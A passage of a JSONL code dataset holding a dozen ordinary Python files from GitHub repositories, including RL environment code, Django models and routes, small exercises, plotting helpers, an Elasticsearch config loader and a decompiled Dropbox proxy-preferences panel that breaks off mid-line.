2:], qp.rot[0], joint_angle]\n\n # qvel:\n # velcotiy of the torso (3,)\n # angular velocity of the torso (3,)\n # joint angle velocities (8,)\n qvel = [qp.vel[0], qp.ang[0], joint_vel]\n #print(jp.concatenate(qpos + qvel))\n #print(self.obs_mask)\n #print(jp.concatenate(qpos + qvel) * self.obs_mask)\n return jp.concatenate(qpos + qvel) * self.obs_mask","repo_name":"facebookresearch/salina","sub_path":"salina_examples/rl/subspace_of_policies/envs/halfcheetah.py","file_name":"halfcheetah.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"78"} +{"seq_id":"69880745852","text":"import unittest\nfrom unittest import mock\n\nBUFF_SIZE = 1024\n\ndef download(response, output):\n total_downloaded = 0\n while True:\n data = response.read(BUFF_SIZE)\n total_downloaded += len(data)\n if not data:\n break\n output.write(data)\n print('Downloaded {bytes}'.format(bytes=total_downloaded))\n\n\nclass DownloadTest(unittest.TestCase):\n def test_download_with_no_length(self):\n response = mock.MagicMock()\n response.read = mock.MagicMock(side_effect=['data', 'more data', ''])\n\n output = mock.MagicMock()\n output.write = mock.MagicMock()\n\n download(response, output)\n\n calls = [mock.call(BUFF_SIZE),\n mock.call(BUFF_SIZE),\n mock.call(BUFF_SIZE)]\n\n response.read.assert_has_calls(calls)\n\n calls = [mock.call('data'),\n mock.call('more data')]\n\n 
output.write.assert_has_calls(calls)\n","repo_name":"felipecruz/exemplos","sub_path":"08_12_download_mock2.py","file_name":"08_12_download_mock2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"78"} +{"seq_id":"7639117911","text":"from django.db import models\n# models\nfrom posting.models import PostProject, PostJobs\n\nclass CommentProjects(models.Model):\n post_project = models.ForeignKey(PostProject, on_delete=models.CASCADE, related_name='post_project_comment')\n user_post = models.ForeignKey(\"accounts.Account\", on_delete=models.CASCADE, related_name='user_post')\n body = models.TextField()\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.user_post)\n\n class Meta:\n verbose_name = 'Comment'\n verbose_name_plural = 'Comment Projects'\n ordering = ['-updated']\n\nclass CommentJobs(models.Model):\n post_job = models.ForeignKey(PostJobs, on_delete=models.CASCADE, related_name='post_job_comment')\n user_job = models.ForeignKey(\"accounts.Account\", on_delete=models.CASCADE, related_name='user_job')\n body = models.TextField()\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return str(self.user_job)\n\n class Meta:\n verbose_name = 'Comment'\n verbose_name_plural = 'Comment Jobs'\n ordering = ['-updated']","repo_name":"marouane-youssfi10/build-social-networking-with-django","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"36766252175","text":"def right(numbers, length):\r\n return numbers[-length:]\r\n\r\n\r\nnumbers = input().split(\"|\")\r\nnumbers = list(map(int, numbers))\r\n\r\nplayer_hp = 0\r\n\r\nline = input()\r\n\r\nwhile line != \"Game over\":\r\n command_line = line.split(\"@\")\r\n command = command_line[0]\r\n\r\n if command == \"Shoot Left\":\r\n start_index = int(command_line[1])\r\n length = int(command_line[2])\r\n if start_index > len(numbers)-1:\r\n pass\r\n else:\r\n index_to_shoot = start_index+length+1\r\n if index_to_shoot < len(numbers) - 1:\r\n shoot_attack = numbers[index_to_shoot] - 5\r\n player_hp+=5\r\n if shoot_attack < 5:\r\n numbers[index_to_shoot] = 0\r\n else:\r\n numbers[index_to_shoot] = shoot_attack\r\n\r\n # if start_index >= 0 and start_index < len(numbers):\r\n # current_target = numbers[start_index]\r\n # current_target -= lenght\r\n # da proverq dali ne izliza ot granici....\r\n\r\n elif command == \"Shoot Right\":\r\n start_index = int(command_line[1]) #4\r\n length = int(command_line[2]) # 5\r\n if start_index > len(numbers) - 1:\r\n pass\r\n else:\r\n right(numbers, length)\r\n index_to_shoot = start_index - length + 1\r\n if index_to_shoot < len(numbers) - 1:\r\n shoot_attack = numbers[index_to_shoot] - 5\r\n player_hp += 5\r\n if shoot_attack < 5:\r\n numbers[index_to_shoot] = 0\r\n else:\r\n numbers[index_to_shoot] = shoot_attack\r\n\r\n elif command == \"Reverse\":\r\n numbers.reverse() ###da go proverq\r\n\r\n line = input()\r\n\r\n\r\nnumbers = list(map(str, numbers))\r\noutput = \" - \".join(numbers)\r\nprint(output)","repo_name":"karolina-eledzhikova/Programming-Fundamentals-with-Python-","sub_path":"Fundamentals_ 
Exams/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12204354438","text":"import io, sys, string\n\ndef testaStringCheia(string, modo): # (string, 1) é meu preferido\n\t\n\tteste = None\n\tlista_teste = []\n\t\n\tprint(type(string))\n\n\tif isinstance(string, str): #saber se tá vazio\n\t\tfor letra in string:\n\t\t\tlista_teste.append(bool(letra))\n\t\t\t\n\t\t\tif letra != \" \":\n\t\t\t\tteste = True\n\t\t\t\n\t\t\tif modo == 1 : # limitar string apenas a segurar letras, sem numeros\n\t\t\t\t\n\t\t\t\tif letra.isnumeric() == True :\n\t\t\t\t\t#print(letra.isnumeric)\n\t\t\t\t\tteste = False\n\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tteste = False\n\t\t\t\t\n\t\t\n\t\tprint(lista_teste)\n\t\t#for booleano in lista_teste:\n\t\t#\tif booleano == True:\n\t\t#\t\tprint(booleano + \" não é vazio.\")\n\t\t\t\t\t\n\t\t\n\t\t\t\t\n\telse:\n\t\tprint(\"[DEBUG] testeStringCheia diz que você entrou com:\")\n\t\tprint(type(string))\t\t\n\t\t\n\t\t\n\tif teste == True :\n\t\tprint(\"[DEBUG] testaStringCheia() = True\")\n\t\treturn True\n\t\t\n\t\t\n\telse:\n\t\tprint(\"[DEBUG] testaStringCheia() = False\")\n\t\treturn False\t\n\n\n\ndef main():\n\ttestaStringCheia(input(\"Entre com uma string:\\n --> \") , 1)\t\t\t\n\n\n\t\t\t\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","repo_name":"requeijaum/simulador_matricula_ifba_2018","sub_path":"testaStringCheia.py","file_name":"testaStringCheia.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"32233661417","text":"\"\"\"\n선형 탐색 변형 (Sentinel Linear Search)\n기존의 선형탐색의 변형된 탐색 알고리즘이다. 탐색을 진행하고자하는 배열의 끝에 타겟 값을 붙이고,\nwhile 루프를 사용해 배열을 순차적으로 탐색을 하게 된다. 타겟 값이 있는 경우 while 문에서 빠져\n나오게된다. while 문을 사용하기 때문에 기존의 선형탐색보다 N번 적은 비교횟수가 일어나게 된다.\n\"\"\"\nfrom __future__ import print_function\n\ntry:\n raw_input # Python 2\nexcept NameError:\n raw_input = input # Python 3\n\n#선형탐색\ndef sentinel_linear_search(sequence, target):\n \"\"\"\n :param sequence : 탐색을 진행할 배열\n :param target : 탐색할 키(key) ���\n ;return : 키 값이 있는 위치(index), 없을 경우 None\n \"\"\"\n sequence.append(target)\n\n index = 0\n \n while sequence[index] != target:\n index += 1\n\n sequence.pop()\n\n if index == len(sequence):\n return None\n\n return index\n\n\nif __name__ == '__main__':\n user_input = raw_input('Enter numbers separated by comma:\\n').strip()\n sequence = [int(item) for item in user_input.split(',')]\n\n target_input = raw_input('Enter a single number to be found in the list:\\n')\n target = int(target_input)\n result = sentinel_linear_search(sequence, target)\n if result is not None:\n print('{} found at positions: {}'.format(target, result))\n else:\n print('Not found')\n","repo_name":"18-2-SKKU-OSS/2018-2-OSS-E5","sub_path":"searches/1-1. sentinel_linear_search.py","file_name":"1-1. 
sentinel_linear_search.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"1764168612","text":"from typing import List\n\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n n, m = len(mat), len(mat[0])\n if n*m != r*c:\n return mat\n curr = 0\n ans = [[1001 for _ in range(c)] for _ in range(r)]\n for i, row in enumerate(mat):\n for j, cell in enumerate(row):\n a, b = curr//c, curr % c\n ans[a][b] = cell\n curr += 1\n return ans\n\n\nprint(Solution().matrixReshape([[1, 2], [3, 4]], 4, 1))\n","repo_name":"andylilfs0217/leet_code","sub_path":"easy/0566_reshape_the_matrix.py","file_name":"0566_reshape_the_matrix.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"36255813910","text":"import pygame\nfrom game_info import *\n\npygame.font.init()\ndef scale_image(img, factor):\n size = round(img.get_width() * factor), round(img.get_height() * factor)\n return pygame.transform.scale(img, size)\n\ndef blit_rotate_center(win, image, top_left, angle):\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(\n center=image.get_rect(topleft=top_left).center)\n win.blit(rotated_image, new_rect.topleft)\n\n\ndef blit_text_center(win, font, text):\n render = font.render(text, 1, (200, 200, 200))\n win.blit(render, (win.get_width()/2 - render.get_width() /\n 2, win.get_height()/2 - render.get_height()/2))\n\ndef draw(win,map,player_car1,player_car2,game_info,MAIN_FONT):\n\timages = map.get_images()\n\tfor k in images:\n\t\tval = images[k]\n\t\tif k == 'finish':\n\t\t\tblit_rotate_center(win,val[0], val[1], 90 - val[2])\n\t\telse:\n\t\t\twin.blit(val[0],val[1])\n\tlevel_text = MAIN_FONT.render(\n f\"Round {game_info.round}\", 1, (255, 255, 255))\n\twin.blit(level_text, (10, win.get_height() - level_text.get_height() - 70))\n\n\ttime_text = MAIN_FONT.render(\n f\"Time: {game_info.get_round_time()}s\", 1, (255, 255, 255))\n\twin.blit(time_text, (10, win.get_height() - time_text.get_height() - 40))\n \n\tplayer_car1.draw(win)\n\tplayer_car2.draw(win)\n\tpygame.display.update()\n\n \n ","repo_name":"quangzp/racing-game","sub_path":"code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18494136722","text":"import unittest\nimport requests\n\n'''\nThis code takes input dict as the input endpoints that need to be tested.\n\nPicks each testcase one by one and then takes the expected status code and api status code and\ncompares the same to check if fails or pass\n\nAdd assert_code param to the input to compare its return code\n\n\n'''\n\n\nclass APITest():\n def __init__(self, input):\n\n # Converting input dict to Class attributes\n self.__dict__ = input\n\n def get_request(self, url ):\n\n return requests.get(url)\n\n def post_request(self , url , body):\n return requests.post(url , body = body)\n\n\n def start_test(self):\n print(\"Starting Testing for {}\".format(self.base_url + self.endpoint))\n\n #Depending on the method in the configuration it will either post a request or get the request\n\n if self.method == 'get':\n response = self.get_request(self.base_url + self.endpoint)\n\n if self.method == 'post':\n response = self.post_request(self.base_url + self.endpoint)\n\n #response = 
requests.get(self.base_url + self.endpoint)\n\n if hasattr(self, 'assert_code'):\n print(\"Testing of Status Code\")\n rsp = response.status_code\n\n if self.assert_code == str(rsp):\n print(\"Tescase Passed\")\n\n else:\n print(\"Testcase Failed\")\n\n if hasattr(self, 'assert_res'):\n '''\n If some passed to assert response also then we can implement this \n '''\n pass\n\n if hasattr(self, 'assert_schema'):\n '''\n if some passed to assert the schema then we can implement this \n '''\n pass\n\n\n\n\nif __name__ == \"__main__\":\n\n input = [{\n 'base_url': 'http://dummy.restapiexample.com/api/v1/',\n 'endpoint': 'employee/81988',\n 'method' : 'get',\n 'type': 'json',\n 'assert_key': 'employee_salary',\n 'assert_code': \"406\",\n\n },\n {\n 'base_url': 'http://dummy.restapiexample.com/api/v1/',\n 'endpoint': 'employees/212',\n 'type': 'json',\n 'method' : 'get',\n 'assert_code': \"406\",\n\n },\n\n {\n 'base_url': 'http://dummy.restapiexample.com/api/v1/',\n 'endpoint': 'employees',\n 'type': 'json',\n 'assert_code': \"406\",\n\n },\n\n {\n 'base_url' : 'http://localhost:8080',\n 'endpoint' : '/post',\n 'method' : 'post',\n 'body' : '{\"key\":\"test\" , \"value\" : \"2\"}',\n 'assert_code' : '200'\n },\n {\n 'base_url': 'http://localhost:8080',\n 'endpoint': '/get/test',\n 'method': 'get',\n 'assert_code': '200'\n }\n\n ]\n\n for each in input:\n print(each)\n Test_obj = APITest(each)\n\n Test_obj.start_test()\n","repo_name":"saurabh1326/grofers","sub_path":"tests/Api_Test.py","file_name":"Api_Test.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34267021589","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport os\n\nCOLORS = list(mcolors.TABLEAU_COLORS)\n\n\ndef plot_data(title: str, data: list, labels: list, path=\"images/\"):\n print(path + title)\n epochs = range(1, len(data[0]) + 1)\n for i, data_group in enumerate(data):\n plt.plot(epochs, data_group, COLORS[i], label=labels[i])\n plt.title(title)\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Loss\")\n plt.legend()\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.mkdir(directory)\n plt.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n plt.close()\n\n\ndef plot_hist(title: str, data: list, path=\"images/\"):\n print(path + title)\n plt.hist(data, bins=243)\n plt.title(title)\n plt.xlabel(\"Result\")\n plt.ylabel(\"Count\")\n plt.legend()\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.mkdir(directory)\n plt.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n plt.close()\n\n\ndef plot_q_values(title: str, data: list, action_labels: list, path=\"images/\"):\n print(path + title)\n print(f\"data dimensions: {data.shape}\")\n print(f\"action_labels: {len(action_labels)}\")\n M = data.shape[0]\n amount = M\n epochs = range(amount)\n fig, axs = plt.subplots(len(action_labels))\n barWidth = 1\n for i in range(len(action_labels)):\n axs[i].plot(\n epochs,\n data[:, i],\n color=COLORS[i],\n label=action_labels[i],\n # width=barWidth,\n )\n axs[i].grid(True)\n axs[i].set_title(f\"{action_labels[i]}\")\n # axs[i].set_xlabel('Epochs')\n # axs[i].set_ylabel('Frequency')\n axs[i].legend(loc=\"center left\", bbox_to_anchor=(1, 0.5))\n fig.subplots_adjust(hspace=1)\n fig.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n # plt.title(title)\n # plt.xlabel('Epochs')\n # plt.ylabel('Frequency')\n # plt.legend()\n plt.close()\n\n\ndef 
plot_frequencies(title: str, data: list, action_labels: list, path=\"images/\"):\n print(path + title)\n print(f\"data dimensions: {data.shape}\")\n print(f\"action_labels: {len(action_labels)}\")\n M = data.shape[0]\n amount = M\n epochs = range(amount)\n fig, axs = plt.subplots(1)\n fig.suptitle(\"Frequencies\")\n barWidth = 1\n if len(action_labels) == 5:\n axs.bar(\n epochs,\n data[:, 0][:amount],\n color=COLORS[0],\n label=action_labels[0],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 1][:amount],\n bottom=data[:, 0][:amount],\n color=COLORS[1],\n label=action_labels[1],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 2][:amount],\n bottom=[i + j for i, j in zip(data[:, 0][:amount], data[:, 1][:amount])],\n color=COLORS[2],\n label=action_labels[2],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 3][:amount],\n bottom=[\n i + j + k\n for i, j, k in zip(\n data[:, 0][:amount], data[:, 1][:amount], data[:, 2][:amount]\n )\n ],\n color=COLORS[3],\n label=action_labels[3],\n width=barWidth,\n )\n axs.bar(\n epochs,\n data[:, 4][:amount],\n bottom=[\n i + j + k + l\n for i, j, k, l in zip(\n data[:, 0][:amount],\n data[:, 1][:amount],\n data[:, 2][:amount],\n data[:, 3][:amount],\n )\n ],\n color=COLORS[4],\n label=action_labels[4],\n width=barWidth,\n )\n else:\n raise ValueError(f\"{len(action_labels)} Number of actions not supported\")\n axs.grid(True)\n axs.set_title(f\"word values\")\n # axs.set_xlabel('Epochs')\n # axs.set_ylabel('Frequency')\n axs.legend(loc=\"center left\", bbox_to_anchor=(1, 0.5))\n # axs.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n # fancybox=True, shadow=True, ncol=5)\n # axs.legend()\n fig.subplots_adjust(hspace=1)\n fig.savefig(f\"{path+title}.png\", bbox_inches=\"tight\")\n # plt.title(title)\n # plt.xlabel('Epochs')\n # plt.ylabel('Frequency')\n # plt.legend()\n plt.close()\n","repo_name":"Morgan-Griffiths/wordle","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71756147772","text":"import logging\nfrom collections import OrderedDict\nimport yaml\n\nlogger = logging.getLogger('cluster_node')\n\nclass ElasticSearchConfig(OrderedDict):\n def __init__(self, cluster, config_file=\"/etc/elasticsearch/elasticsearch.yml\"):\n self.config_file = config_file\n with open(config_file) as f:\n super(ElasticSearchConfig, self).__init__(sorted(yaml.safe_load(f.read()).items()))\n self['cluster']['name'] = cluster.elastic_search_cluster_name\n self['node']['roles'] = []\n if cluster.is_data:\n self['node']['roles'].append('data')\n if cluster.is_master:\n self['node']['roles'].append('master')\n if cluster.tags.get('initial_master', 'False') == 'True':\n self['cluster']['initial_master_nodes'] = [cluster.instance_id]\n\n def save(self):\n \"\"\"\n Save to config_dir\n :return:\n \"\"\"\n with open(self.config_file, 'w') as f:\n config = yaml.safe_dump(dict(self), default_flow_style=False)\n f.write(config)\n\n\nclass HotelElasticSearchConfig(OrderedDict):\n def __init__(self, config_file=\"/etc/hotel-elasticsearch/hotel-config.yml\"):\n try:\n with open(config_file) as f:\n super(HotelElasticSearchConfig, self).__init__(sorted(yaml.safe_load(f.read()).items()))\n except FileNotFoundError:\n logger.warning(f\"Config file {config_file} not found, using defaults\")\n\n # Set defaults\n if 'hotel' not in self:\n self['hotel'] = OrderedDict()\n if 'alerting' not in self['hotel']:\n 
self['hotel']['alerting'] = OrderedDict()\n if 'alerter' not in self['hotel']['alerting']:\n self['hotel']['alerting']['alerter'] = None\n if 'backup' not in self['hotel']:\n self['hotel']['backup'] = OrderedDict()\n if 'bucket' not in self['hotel']['backup']:\n self['hotel']['backup']['bucket'] = 'hotel-elasticsearch-backup'\n\n\n\n","repo_name":"plecto/hotel-elasticsearch","sub_path":"hotel_elasticsearch/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29193533710","text":"from django.urls import re_path\nfrom rest_framework.routers import SimpleRouter\n\nfrom .view import serializer_view, generic_view, child_view, mixin_view, api_view, viewset_view, genericViewset_view, \\\n modelviewset\n\nurlpatterns = [\n # 多对象\n re_path(r'books$', serializer_view.Books.as_view()),\n # 单对象\n re_path(r'book/(?P\\d)$', serializer_view.Book.as_view()),\n\n # APIView多对象\n re_path(r'apibooks$', api_view.Books.as_view()),\n # APIView单对象\n re_path(r'apibook/(?P\\d)$', api_view.Book.as_view()),\n\n # genericView多对象\n re_path(r'gnbooks$', generic_view.Books.as_view()),\n # genericView单对象\n re_path(r'gnbook/(?P\\d)$', generic_view.Book.as_view()),\n\n # genericView多对象+mixin\n re_path(r'mxbooks$', mixin_view.Books.as_view()),\n # genericView单对象+mixin\n re_path(r'mxbook/(?P\\d)$', mixin_view.Book.as_view()),\n\n # genericView多对象+mixin集合子类\n re_path(r'chbooks$', child_view.Books.as_view()),\n # genericView单对象+mixin集合子类\n re_path(r'chbook/(?P\\d)$', child_view.Book.as_view()),\n\n # viewset\n re_path(r'vsbooks$', viewset_view.Books.as_view({'get': 'list', 'post': 'create'})),\n # viewset\n re_path(r'vsbook/(?P\\d)$', viewset_view.Book.as_view({'get': 'retrieve', 'put': 'updata'})),\n # viewset自定义方法名匹配\n re_path(r'vsbooks/test$', viewset_view.Books.as_view({'get': 'list', 'post': 'create', 'put': 'test'})),\n\n # genericviewset\n re_path(r'gvsbooks$', genericViewset_view.Books.as_view({'get': 'list', 'post': 'create'})),\n # genericviewset\n re_path(r'gvsook/(?P\\d)$', genericViewset_view.Book.as_view({'get': 'retrieve', 'put': 'updata'})),\n # genericviewset自定义方法名匹配\n re_path(r'gvsbooks/test$', genericViewset_view.Books.as_view({'get': 'list', 'post': 'create', 'put': 'test'})),\n\n # modelviewset\n re_path(r'mdbooks$', modelviewset.Books.as_view({'get': 'list', 'post': 'create'})),\n # modelviewset\n re_path(r'mdsook/(?P\\d)$', modelviewset.Book.as_view({'get': 'retrieve', 'put': 'updata'})),\n]\n\n# 自动生成路由\nrouter = SimpleRouter() # 创建对象\nrouter.register('zdybooks', modelviewset.Books, basename='books') # 路径+调用的方法+路由命名\nrouter.register('zdyffbooks', modelviewset.Books)\nurlpatterns += router.urls # 自动生成的路由添加到路由列表\nprint(urlpatterns)\n\n","repo_name":"Kaplc/Drf-Learn","sub_path":"drf_learn/drf_learn/apps/books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2714247021","text":"#Embedded file name: ui/wxpython/preferences.py\nfrom __future__ import absolute_import\nimport itertools\nimport functools\nimport sys\nimport wx\nfrom build_number import VERSION\nimport arch\nfrom dropbox.features import feature_enabled\nfrom dropbox.globals import dropbox_globals\nfrom dropbox.gui import assert_message_queue, event_handler, message_sender, spawn_thread_with_name\nimport dropbox.i18n\nfrom dropbox.preferences import NO_PROXY, AUTO_PROXY, 
MANUAL_PROXY, OPT_BUBBLES, OPT_LANG, OPT_P2P, OPT_STARTUP, HTTP, SOCKS4, SOCKS5\nfrom dropbox.trace import TRACE, unhandled_exc_handler\nfrom dropbox.client.screenshots import ScreenshotsController\nfrom ui.wxpython.screenshots import ScreenshotsSelector\nimport ui.images\nfrom ..common.preferences import ValidPort, ValidBandwidth, pref_strings, change_client_language, PanelNames\nfrom ..common.selective_sync import selsync_strings\nfrom .camera import CameraUploadLauncher, PhotoImportLauncher\nfrom .constants import platform, GNOME\nfrom .dropbox_controls import TypeBox, SpinTypeBox, Throbber\nfrom .location_changer import DropboxLocationChanger\nfrom .selective_sync import SelectiveSyncLauncher\nfrom .static_link_text import StaticLinkText\nfrom .tabbedframe import DropboxTabbedFrame, InvalidEntryException, DropboxTabPanel\nif sys.platform.startswith('win'):\n from dropbox.win32.version import VISTA, WINDOWS_VERSION\n\nclass ProxySettingsPanel(DropboxTabPanel):\n\n @staticmethod\n def icon():\n return ui.images.wximages.PrefsNetwork.GetBitmap()\n\n @staticmethod\n def shortname():\n return pref_strings.proxy_tab_label\n\n @staticmethod\n def help_index():\n return 'proxies'\n\n @event_handler\n def read(self, state):\n if state['proxy_mode'] == NO_PROXY:\n self.rb[0].SetValue(True)\n elif state['proxy_mode'] == AUTO_PROXY:\n self.rb[1].SetValue(True)\n else:\n self.rb[2].SetValue(True)\n self.proxy_type_choice.SetStringSelection(state['proxy_type'])\n self.server_text.SetValue(state['proxy_server'])\n self.port_nsbox.SetValue(state['proxy_port'])\n self.auth_req.SetValue(state['proxy_requires_auth'])\n self.user_text.SetValue(state['proxy_username'])\n self.pass_text.SetValue(state['proxy_password'])\n self.handle_proxy_choice(None)\n self.handle_prox_type_choice(None)\n\n @event_handler\n def save(self, theEvent):\n state = {}\n if self.rb[0].GetValue():\n state['proxy_mode'] = NO_PROXY\n elif self.rb[1].GetValue():\n state['proxy_mode'] = AUTO_PROXY\n else:\n state['proxy_mode'] = MANUAL_PROXY\n state['proxy_type'] = self.proxy_type_choice.GetStringSelection()\n state['proxy_server'] = self.server_text.GetValue()\n try:\n state['proxy_port'] = self.port_nsbox.GetValue()\n except TypeBox.EntryErrors:\n raise InvalidEntryException(self.__class__, pref_strings.proxy_port_error)\n\n state['proxy_requires_auth'] = self.auth_req.GetValue()\n state['proxy_username'] = self.user_text.GetValue()\n state['proxy_password'] = self.pass_text.GetValue()\n return state\n\n @event_handler\n def handle_proxy_choice(self, theEvent):\n for win in [self.proxlbl,\n self.proxy_type_choice,\n self.slbl,\n self.server_text,\n self.port_nsbox,\n self.auth_req,\n self.ulbl,\n self.passlbl,\n self.user_text,\n self.pass_text]:\n win.Enable(self.rb[2].GetValue())\n\n self.handle_prox_type_choice(theEvent)\n\n @event_handler\n def handle_prox_type_choice(self, theEvent):\n for win in [self.auth_req,\n self.ulbl,\n self.passlbl,\n self.user_text,\n self.pass_text]:\n win.Enable(self.rb[2].GetValue() and self.proxy_type_choice.GetStringSelection() in (HTTP, SOCKS5))\n\n self.handle_auth_checkbox(theEvent)\n\n @event_handler\n def handle_auth_checkbox(self, theEvent):\n for win in [self.ulbl,\n self.passlbl,\n self.user_text,\n self.pass_text]:\n win.Enable(self.auth_req.GetValue() and self.rb[2].GetValue() and self.proxy_type_choice.GetStringSelection() in (HTTP, SOCKS5))\n\n self.invalidate(theEvent)\n\n @event_handler\n def __init__(self, wx_parent, parent, dropbox_app, has_own_borders):\n 
super(ProxySettingsPanel, self).__init__(wx_parent, parent, dropbox_app)\n self.has_own_borders = has_own_borders\n border = self.border = wx.BoxSizer(wx.VERTICAL)\n if self.has_own_borders:\n proxy_box = wx.StaticBox(self)\n pb_sizer = wx.StaticBoxSizer(proxy_box, wx.VERTICAL)\n TypeBox_t = TypeBox\n else:\n TypeBox_t = SpinTypeBox\n self.up_self = up_self = wx.Panel(self)\n self.rb = rb = [wx.RadioButton(up_self, label=pref_strings.no_proxy_choice, style=wx.RB_GROUP), wx.RadioButton(up_self, label=pref_strings.auto_proxy_choice), wx.RadioButton(up_self, label=pref_strings.manual_proxy_choice)]\n windows_wx_bug_workaround = wx.RadioButton(up_self, style=wx.RB_GROUP)\n windows_wx_bug_workaround.Show(False)\n\n def cell():\n up_sizer.AddSpacer(wx.Size(0, 0))\n\n up_sizer = wx.FlexGridSizer(cols=5)\n up_self.SetSizer(up_sizer)\n self.proxy_settings_lbl = proxy_settings_lbl = wx.StaticText(up_self, label=pref_strings.proxy_settings_label)\n up_sizer.AddStretchSpacer()\n up_sizer.Add(proxy_settings_lbl, border=platform.statictext_baseline_adjustment_to_match_radio, flag=wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT | wx.BOTTOM)\n up_sizer.AddSpacer(wx.Size(platform.statictext_textctrl_horizontal_spacing, 0))\n up_sizer.Add(rb[0], flag=wx.LEFT | wx.ALIGN_BOTTOM)\n up_sizer.AddStretchSpacer()\n up_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(rb[1], flag=wx.LEFT)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n cell()\n up_sizer.Add(rb[2], flag=wx.LEFT, border=0)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.radio_group_spacer))\n cell()\n cell()\n cell()\n cell()\n self.proxlbl = proxlbl = wx.StaticText(up_self, label=pref_strings.proxy_type_label)\n self.proxy_type_choice = proxy_type_choice = wx.Choice(up_self, choices=[HTTP, SOCKS4, SOCKS5])\n proxy_type_choice.Bind(wx.EVT_CHOICE, self.handle_prox_type_choice)\n cell()\n up_sizer.Add(proxlbl, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n cell()\n up_sizer.Add(proxy_type_choice, border=platform.choice_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM)\n cell()\n up_sizer.AddSpacer(wx.Size(0, platform.textctrl_textctrl_vertical_spacing))\n cell()\n cell()\n cell()\n cell()\n if platform == GNOME:\n port_size = 60\n else:\n port_size = 48\n self.slbl = slbl = wx.StaticText(up_self, label=pref_strings.proxy_server_label)\n self.server_text = server_text = wx.TextCtrl(up_self, value='', size=wx.Size(platform.username_textctrl_width, -1))\n self.port_nsbox = TypeBox_t(up_self, ValidPort, size=wx.Size(port_size, -1), on_text=[self.invalidate])\n server_text_and_more_hsizer = wx.BoxSizer(wx.HORIZONTAL)\n server_text_and_more_hsizer.Add(server_text)\n server_text_and_more_hsizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing / 2, 0))\n server_text_and_more_hsizer.Add(wx.StaticText(up_self, label=':'), border=1, flag=wx.BOTTOM | wx.ALIGN_CENTER_VERTICAL)\n server_text_and_more_hsizer.AddSpacer(wx.Size(platform.textctrl_statictext_horizontal_spacing / 2, 0))\n server_text_and_more_hsizer.Add(self.port_nsbox)\n cell()\n up_sizer.Add(slbl, border=platform.statictext_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM | wx.ALIGN_RIGHT)\n cell()\n up_sizer.Add(server_text_and_more_hsizer, border=platform.textctrl_baseline_adjustment, flag=wx.BOTTOM | wx.ALIGN_BOTTOM)\n cell()\n self.auth_req = auth_req = 
